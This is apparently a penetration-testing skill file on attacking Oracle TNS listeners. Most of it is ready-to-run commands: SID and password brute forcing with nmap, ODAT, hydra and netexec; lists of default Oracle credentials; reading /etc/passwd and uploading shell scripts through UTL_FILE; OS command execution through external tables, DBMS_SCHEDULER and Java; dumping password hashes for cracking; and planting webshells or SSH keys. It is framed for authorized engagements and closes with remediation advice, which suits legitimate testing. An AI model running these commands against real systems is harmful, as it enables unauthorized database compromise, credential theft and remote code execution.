By name: pentesting-oracle description: Testing Oracle Database via the TNS Listener (default ports 1521, plus secondary listeners 1522-1529) for SID disclosure/bruteforce, default and weak account credentials, TNS listener misconfiguration and poisoning, and ODAT-driven file read/write and OS command-execution primitives during authorized engagements. domain: cybersecurity subdomain: network-services-pentesting tags:
- penetration-testing
- network-services
- database
- oracle version: '1.0' author: xalgorix license: Apache-2.0
Pentesting Oracle TNS Listener (port 1521)
When to Use
- Default
1521/tcp(TNS Listener); secondary listeners commonly on1522-1529, legacy on1748. - Banner like
Oracle TNS Listener 9.2.0.1.0; the listener is the entry point — you must learn a SID/service name before authenticating. - Use when
nmapshowsoracle-tns, when you have recovered DB account creds, or to abuse the listener (older versions allow remote control / poisoning).
Quick Enumeration
# Version
nmap --script oracle-tns-version -p1521 -sV <IP>
nmap --script "oracle-sid-brute" -p1521 <IP> # discover SIDs
# All-in-one with ODAT (the primary Oracle pentest tool)
./odat-libc2.12-x86_64 all -s <IP> -p 1521
# SID + credential brute via ODAT
./odat sidguesser -s <IP> -p 1521
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
msfconsole -q -x 'use auxiliary/scanner/oracle/sid_enum; set RHOSTS <IP>; run; exit'
Critical: Checks Most Often Missed
- SID/service name disclosure — without a SID you cannot log in; older listeners disclose it, otherwise brute force it.
- How to CONFIRM:
nmap --script oracle-sid-brute -p1521 <IP>or./odat sidguesser -s <IP>returns a SID (e.g.XE,ORCL,PLSExtProc).
- How to CONFIRM:
- Default / weak account credentials — Oracle ships many well-known accounts:
system:manager,sys:change_on_install,scott:tiger,dbsnmp:dbsnmp,outln:outln,system:oracle.- How to CONFIRM:
sqlplus system/manager@<IP>:1521/<SID>connects, or./odat passwordguesserreports valid pairs.
- How to CONFIRM:
- TNS listener with no password / TNS poison (CVE-2012-1675) — an unauthenticated listener can be queried/reconfigured; TNS poisoning lets an attacker register a rogue instance and MITM sessions.
- How to CONFIRM:
tnscmd10g status -h <IP>returns listener details without a password; check listener version against CVE-2012-1675.
- How to CONFIRM:
- File read/write + OS command execution via ODAT — with a valid DB account, abuse
UTL_FILE(read/write files), external tables,DBMS_SCHEDULER/Java stored procedures (run OS commands), andUTL_HTTP/UTL_TCPfor SSRF.- How to CONFIRM:
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /tmp x /etc/passwdretrieves a file;./odat externaltable ... --exec ...or./odat dbmsscheduler ... --execruns a command.
- How to CONFIRM:
- Privilege escalation via PUBLIC/EXECUTE grants — over-granted packages (
DBMS_*) let low-priv users escalate to DBA.
Workflow
Step 1: Enumerate (version, SID, accounts)
nmap --script oracle-tns-version,oracle-sid-brute -p1521 <IP>
./odat sidguesser -s <IP> -p 1521
# Once a SID is known, fingerprint accessible accounts
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
Step 2: Authenticate (default/weak creds, brute force)
# Native client (instantclient sqlplus)
sqlplus <user>/<pass>@<IP>:1521/<SID>
sqlplus system/manager@<IP>:1521/XE
# As SYSDBA
sqlplus sys/change_on_install@<IP>:1521/XE as sysdba
# Brute force
./odat passwordguesser -s <IP> -d <SID> --accounts-file /usr/share/oscanner/accounts.default
hydra -L users.txt -P passwords.txt <IP> oracle-listener # or oracle-sid
nxc oracle <IP> --sid <SID> -u users.txt -p passwords.txt
Step 3: Exploit / Extract (data dump + ODAT file/RCE primitive)
-- Native recon once connected
SELECT * FROM v$version;
SELECT username FROM all_users;
SELECT name, password, spare4 FROM sys.user$; -- hashes (DBA)
SELECT table_name FROM all_tables;
# Arbitrary file READ / WRITE (UTL_FILE)
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc x /etc/passwd
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --putFile /tmp shell.sh ./shell.sh
# OS command execution
./odat externaltable -s <IP> -d <SID> -U <user> -P <pass> --exec /tmp run.sh
./odat dbmsscheduler -s <IP> -d <SID> -U <user> -P <pass> --exec "/bin/bash -c 'id'"
./odat java -s <IP> -d <SID> -U <user> -P <pass> --exec "id"
# Upload + run a reverse shell payload end to end
./odat all -s <IP> -d <SID> -U <user> -P <pass>
Step 4: Post-access / privilege escalation / pivot
- Dump
sys.user$password hashes (Oracle 10g DES, 11g SHA-1spare4) and crack with Hashcat (modes 3100 / 112). - Abuse over-granted
DBMS_*packages orCREATE ANY PROCEDURE/EXECUTE ANYto reach DBA, then SYSDBA. - Use
UTL_HTTP/UTL_TCP/UTL_INADDRfrom the DB for SSRF / internal port scanning, and the DB host file-write to land SSH keys or webshells. - Reuse recovered Oracle creds (often reused for
dbsnmp, app accounts) against other services.
Key Concepts
| Concept | Description |
|---|---|
| TNS Listener | Network front-end on 1521 that routes clients to DB instances; must be queried for a SID. |
| SID / Service name | Identifier of a database instance required to authenticate (e.g. XE, ORCL). |
| Default accounts | Well-known creds (system/manager, sys/change_on_install, scott/tiger, dbsnmp/dbsnmp). |
| TNS poisoning (CVE-2012-1675) | Rogue instance registration on an unauthenticated listener enabling session MITM. |
| UTL_FILE | PL/SQL package for reading/writing files on the DB server. |
| External tables / DBMS_SCHEDULER / Java SP | PL/SQL mechanisms ODAT abuses for OS command execution. |
| UTL_HTTP / UTL_TCP | Outbound network packages enabling SSRF and internal scanning. |
Tools & Systems
| Tool | Purpose |
|---|---|
| ODAT | Oracle Database Attacking Tool — SID guess, password guess, UTL_FILE read/write, external-table/DBMS_SCHEDULER/Java command exec, all chain. |
| sqlplus / instantclient | Native client for authenticated queries and SYSDBA login. |
| nmap NSE | oracle-tns-version, oracle-sid-brute, oracle-brute, oracle-enum-users. |
| Metasploit | scanner/oracle/sid_enum, tnscmd, oracle_login, listener/version modules. |
| netexec (nxc) | nxc oracle <IP> --sid <SID> -u .. -p .. for auth/spraying. |
| hydra | Brute force oracle-listener / oracle-sid services. |
| Hashcat / John | Crack dumped sys.user$ hashes (modes 3100 / 112). |
Common Scenarios
Scenario 1: SID brute → default creds → data dump
oracle-sid-brute reveals SID XE. sqlplus system/manager@<IP>:1521/XE connects with the default password, and the tester dumps application tables and sys.user$ hashes.
Scenario 2: Valid account → OS command execution
With a low-priv DB account, ODAT's external-table module writes a script to disk and executes it (./odat externaltable ... --exec), returning command output as the Oracle OS user.
Scenario 3: Unauthenticated listener → poisoning
An old listener answers tnscmd10g status without a password and is vulnerable to CVE-2012-1675, allowing a rogue instance to be registered and client sessions to be intercepted.
Output Format
## Oracle Finding
**Service**: Oracle TNS Listener
**Port**: 1521/tcp (Oracle 11g, SID=XE)
**Severity**: Critical
**Finding**: Default SYSTEM credentials enabling file read and OS command execution
**Evidence**:
- nmap oracle-sid-brute -> SID "XE"
- sqlplus system/manager@<IP>:1521/XE -> connected
- ./odat externaltable -s <IP> -d XE -U system -P manager --exec /tmp id -> uid=54321(oracle)
**Impact**: Full database compromise plus OS command execution as the Oracle service account.
**Recommendation**:
1. Change all default account passwords; lock/expire unused accounts (scott, dbsnmp, outln).
2. Set a listener password and apply patches for CVE-2012-1675 (enable Valid Node Checking).
3. Restrict 1521-1529 by firewall/source IP.
4. Revoke EXECUTE on UTL_FILE / DBMS_SCHEDULER / Java from PUBLIC and least-privilege app accounts.